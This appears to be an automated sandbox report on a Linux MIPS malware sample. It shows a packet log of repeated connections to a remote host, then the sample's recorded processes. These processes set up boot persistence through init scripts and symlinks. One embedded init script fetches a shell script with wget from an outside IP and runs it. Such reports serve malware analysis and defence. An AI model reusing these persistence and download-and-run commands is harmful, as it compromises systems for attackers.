                                              Dec 24, 2024 05:19:17.513202906 CET382426011294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:17.974831104 CET382426011294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:17.975023031 CET6011238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:18.349977016 CET6011438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:18.469634056 CET382426011494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:18.469732046 CET6011438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:18.469789028 CET6011438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:18.589210033 CET382426011494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:18.975110054 CET6011438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:19.134932041 CET382426011494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:19.587642908 CET382426011494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:19.587969065 CET6011438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:19.976691008 CET6011638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:20.096273899 CET382426011694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:20.096492052 CET6011638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:20.096492052 CET6011638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:20.215946913 CET382426011694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:20.602065086 CET6011638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:20.762938023 CET382426011694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:21.238017082 CET382426011694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:21.238219976 CET6011638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:21.603724003 CET6011838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:21.723294973 CET382426011894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:21.723516941 CET6011838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:21.723516941 CET6011838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:21.844221115 CET382426011894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:22.228745937 CET6011838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:22.395751953 CET382426011894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:22.847671986 CET382426011894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:22.847943068 CET6011838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:23.230416059 CET6012038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:23.350162983 CET382426012094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:23.350346088 CET6012038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:23.350346088 CET6012038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:23.469890118 CET382426012094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:23.855834961 CET6012038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:24.018861055 CET382426012094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:24.467421055 CET382426012094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:24.467751026 CET6012038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:24.857383966 CET6012238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:24.976999044 CET382426012294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:24.977087975 CET6012238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:24.977175951 CET6012238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:25.098133087 CET382426012294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:25.482691050 CET6012238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:25.642904997 CET382426012294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:26.102005005 CET382426012294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:26.102195978 CET6012238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:26.484446049 CET6012438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:26.604006052 CET382426012494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:26.604105949 CET6012438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:26.604286909 CET6012438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:26.725670099 CET382426012494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:27.109967947 CET6012438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:27.274859905 CET382426012494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:27.726867914 CET382426012494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:27.727123976 CET6012438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:28.111805916 CET6012638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:28.231302977 CET382426012694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:28.231391907 CET6012638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:28.231575966 CET6012638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:28.350991011 CET382426012694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:28.737488985 CET6012638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:28.898873091 CET382426012694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:29.344816923 CET382426012694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:29.345006943 CET6012638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:29.739286900 CET6012838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:29.858820915 CET382426012894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:29.859025002 CET6012838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:29.859071016 CET6012838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:29.978533983 CET382426012894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:30.364861012 CET6012838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:30.530812025 CET382426012894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:30.985480070 CET382426012894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:30.985744953 CET6012838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:31.366409063 CET6013038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:31.486015081 CET382426013094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:31.486186981 CET6013038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:31.486269951 CET6013038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:31.605700016 CET382426013094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:31.992501974 CET6013038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:32.154794931 CET382426013094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:32.634937048 CET382426013094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:32.635094881 CET6013038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:32.994035959 CET6013238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:33.113729954 CET382426013294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:33.113956928 CET6013238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:33.113956928 CET6013238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:33.233530045 CET382426013294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:33.619153023 CET6013238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:33.782777071 CET382426013294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:34.245012045 CET382426013294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:34.245202065 CET6013238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:34.621619940 CET6013438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:34.741059065 CET382426013494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:34.741266966 CET6013438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:34.741266966 CET6013438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:34.860723019 CET382426013494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:35.248855114 CET6013438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:35.411415100 CET382426013494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:35.869440079 CET382426013494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:35.869723082 CET6013438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:36.250314951 CET6013638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:36.370949030 CET382426013694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:36.371047974 CET6013638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:36.371104002 CET6013638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:36.490551949 CET382426013694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:36.876873970 CET6013638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:37.038754940 CET382426013694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:37.500721931 CET382426013694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:37.500905991 CET6013638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:37.878386974 CET6013838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:37.997874022 CET382426013894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:37.998078108 CET6013838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:37.998121977 CET6013838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:38.117721081 CET382426013894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:38.507817030 CET6013838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:38.674727917 CET382426013894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:39.128717899 CET382426013894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:39.128878117 CET6013838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:39.509639978 CET6014038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:39.629108906 CET382426014094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:39.629228115 CET6014038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:39.629242897 CET6014038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:39.748661041 CET382426014094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:40.134289980 CET6014038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:40.298711061 CET382426014094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:40.768836975 CET382426014094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:40.768963099 CET6014038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:41.136540890 CET6014238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:41.256027937 CET382426014294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:41.256148100 CET6014238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:41.256309032 CET6014238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:41.376481056 CET382426014294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:41.764607906 CET6014238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:41.926960945 CET382426014294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:42.387768030 CET382426014294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:42.387918949 CET6014238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:42.767060995 CET6014438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:42.886847019 CET382426014494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:42.886966944 CET6014438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:42.887077093 CET6014438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:43.006597996 CET382426014494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:43.394990921 CET6014438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:43.554687023 CET382426014494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:44.006587982 CET382426014494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:44.006771088 CET6014438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:44.397274017 CET6014638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:44.516746044 CET382426014694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:44.516911983 CET6014638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:44.516911983 CET6014638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:44.636465073 CET382426014694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:45.024745941 CET6014638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:45.186738968 CET382426014694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:45.641913891 CET382426014694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:45.642160892 CET6014638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:46.026482105 CET6014838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:46.146019936 CET382426014894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:46.146243095 CET6014838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:46.146352053 CET6014838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:46.265878916 CET382426014894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:46.653172016 CET6014838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:46.814675093 CET382426014894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:47.261255026 CET382426014894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:47.261531115 CET6014838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:47.655482054 CET6015038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:47.775698900 CET382426015094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:47.775821924 CET6015038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:47.775918961 CET6015038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:47.895342112 CET382426015094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:48.283889055 CET6015038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:48.446639061 CET382426015094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:48.899286032 CET382426015094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:48.899446011 CET6015038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:49.285898924 CET6015238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:49.405417919 CET382426015294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:49.405474901 CET6015238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:49.405488968 CET6015238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:49.524983883 CET382426015294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:49.911632061 CET6015238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:50.074692011 CET382426015294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:50.527853012 CET382426015294.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:50.528028965 CET6015238242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:50.913563013 CET6015438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:51.033056021 CET382426015494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:51.033153057 CET6015438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:51.033211946 CET6015438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:51.152676105 CET382426015494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:51.539659023 CET6015438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:51.702749968 CET382426015494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:52.154441118 CET382426015494.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:52.154721022 CET6015438242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:52.541908979 CET6015638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:52.661746025 CET382426015694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:52.661988020 CET6015638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:52.661988020 CET6015638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:52.781871080 CET382426015694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:53.169641972 CET6015638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:53.330564022 CET382426015694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:53.796082020 CET382426015694.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:53.796355963 CET6015638242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:54.171912909 CET6015838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:54.293092966 CET382426015894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:54.293337107 CET6015838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:54.293428898 CET6015838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:54.412868977 CET382426015894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:54.802892923 CET6015838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:54.967410088 CET382426015894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:55.427354097 CET382426015894.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:55.427443981 CET6015838242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:55.805191994 CET6016038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:55.927010059 CET382426016094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:55.927138090 CET6016038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:55.927198887 CET6016038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:56.046643972 CET382426016094.156.227.234192.168.2.23
                                              Dec 24, 2024 05:19:56.434752941 CET6016038242192.168.2.2394.156.227.234
                                              Dec 24, 2024 05:19:56.594728947 CET382426016094.156.227.234192.168.2.23

                                              System Behavior

                                              Start time (UTC):04:17:50
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:/tmp/mipsel.nn.elf
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/systemctl
                                              Arguments:systemctl enable custom.service
                                              File size:996584 bytes
                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/chmod
                                              Arguments:chmod +x /etc/init.d/system
                                              File size:63864 bytes
                                              MD5 hash:739483b900c045ae1374d6f53a86a279

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/ln
                                              Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                              File size:76160 bytes
                                              MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/chmod
                                              Arguments:chmod +x /etc/init.d/mipsel.nn.elf
                                              File size:63864 bytes
                                              MD5 hash:739483b900c045ae1374d6f53a86a279

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/mkdir
                                              Arguments:mkdir -p /etc/rc.d
                                              File size:88408 bytes
                                              MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/bin/sh
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/ln
                                              Arguments:ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
                                              File size:76160 bytes
                                              MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/tmp/mipsel.nn.elf
                                              Arguments:-
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                              Start time (UTC):04:17:50
                                              Start date (UTC):24/12/2024
                                              Path:/usr/lib/udisks2/udisksd
                                              Arguments:-
                                              File size:483056 bytes
                                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/sbin/dumpe2fs
                                              Arguments:dumpe2fs -h /dev/dm-0
                                              File size:31112 bytes
                                              MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/lib/systemd/systemd
                                              Arguments:-
                                              File size:1620224 bytes
                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                              File size:22760 bytes
                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/lib/udisks2/udisksd
                                              Arguments:-
                                              File size:483056 bytes
                                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                              Start time (UTC):04:17:51
                                              Start date (UTC):24/12/2024
                                              Path:/usr/sbin/dumpe2fs
                                              Arguments:dumpe2fs -h /dev/dm-0
                                              File size:31112 bytes
                                              MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                              Start time (UTC):04:17:52
                                              Start date (UTC):24/12/2024
                                              Path:/usr/lib/udisks2/udisksd
                                              Arguments:-
                                              File size:483056 bytes
                                              MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                              Start time (UTC):04:17:52
                                              Start date (UTC):24/12/2024
                                              Path:/usr/sbin/dumpe2fs
                                              Arguments:dumpe2fs -h /dev/dm-0
                                              File size:31112 bytes
                                              MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                              Start time (UTC):04:18:27
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/dash
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:18:27
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/rm
                                              Arguments:rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
                                              File size:72056 bytes
                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                              Start time (UTC):04:18:27
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/dash
                                              Arguments:-
                                              File size:129816 bytes
                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                              Start time (UTC):04:18:27
                                              Start date (UTC):24/12/2024
                                              Path:/usr/bin/rm
                                              Arguments:rm -f /tmp/tmp.aMCx9Fums0 /tmp/tmp.JCLTTmWabl /tmp/tmp.SRiGvKqYas
                                              File size:72056 bytes
                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b